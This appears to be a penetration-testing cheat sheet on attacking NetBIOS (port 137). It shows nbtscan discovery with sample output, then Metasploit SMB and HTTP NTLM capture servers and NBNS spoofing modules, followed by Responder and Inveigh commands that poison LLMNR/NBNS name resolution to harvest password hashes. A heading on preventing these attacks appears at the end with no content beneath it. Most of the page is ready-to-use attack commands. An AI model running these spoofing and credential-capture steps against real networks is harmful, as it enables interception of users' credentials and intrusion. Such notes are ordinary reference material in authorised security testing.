137 - Netbios

Broadcast discovery

nbtscan 172.18.2.0/24
	
172.18.2.9:GCDTA0000:00U
172.18.2.9:WORKGROUP:00G
172.18.2.9:GCDTA0000:20U
172.18.2.9:MAC:00-23-7d-aa-72-c2

nbt-wizz version version:

Download:

wget http://www.unixwiz.net/tools/nbtscan-1.0.35-redhat-linux
root@Kali:~/Downloads# ./nbtscan-1.0.35-redhat-linux -A 192.168.0.15 
192.168.0.38    WORKGROUP\DOOKOSSEL             SHARING 
  DOOKOSSEL      <00> UNIQUE Workstation Service 
  DOOKOSSEL      <03> UNIQUE Messenger Service<3> 
  DOOKOSSEL      <20> UNIQUE File Server Service 
  ..__MSBROWSE__.<01> GROUP  Master Browser 
  WORKGROUP      <00> GROUP  Domain Name 
  WORKGROUP      <1d> UNIQUE Master Browser 
  WORKGROUP      <1e> GROUP  Browser Service Elections 
  00:00:00:00:00:00   ETHER

Windows NBTSCAN

Netbios Spoofing

Metasploit

use auxiliary/server/capture/smb
set CAINPWFILE /netbios/cain.
set JOHNPWFILE /netbios/john. 

set LOGFILE /netbios/SMB_LOG.txt
set SRVHOST 10.222.101.213
run
	
use auxiliary/server/capture/http_ntlm
set CAINPWFILE /netbios/cain-http
set JOHNPWFILE /netbios/john-http
set SRVHOST 10.222.101.213
set SRVPORT 80
set URIPATH /
run
	
use auxiliary/spoof/nbns/nbns_response
set INTERFACE eth0
set SPOOFIP 10.222.101.213
run

Capture Netbios broadcasts

Responder

sudo python3.9 /usr/share/responder/Responder.py -I eth0 -w -f -v

Inveigh - (Powershell Responder)

requires privileged user.

https://n0where.net/windows-powershell-llmnrnbns-spoofer-inveigh https://github.com/Kevin-Robertson/Inveigh

cd C:\Users\Leon\powermenu\Inveigh\Inveigh-master
Import-Module .\Inveigh.psm1

To execute with default settings

Invoke-Inveigh

To execute with features enabled/disabled

Invoke-Inveigh -LLMNR Y -NBNS Y -HTTP Y -HTTPS Y -SMB Y -ConsoleOutput Y -IP <yourIP>

You must Stop Inveigh manually

Stop-Inveigh

Preventing Netbios attacks

Last updated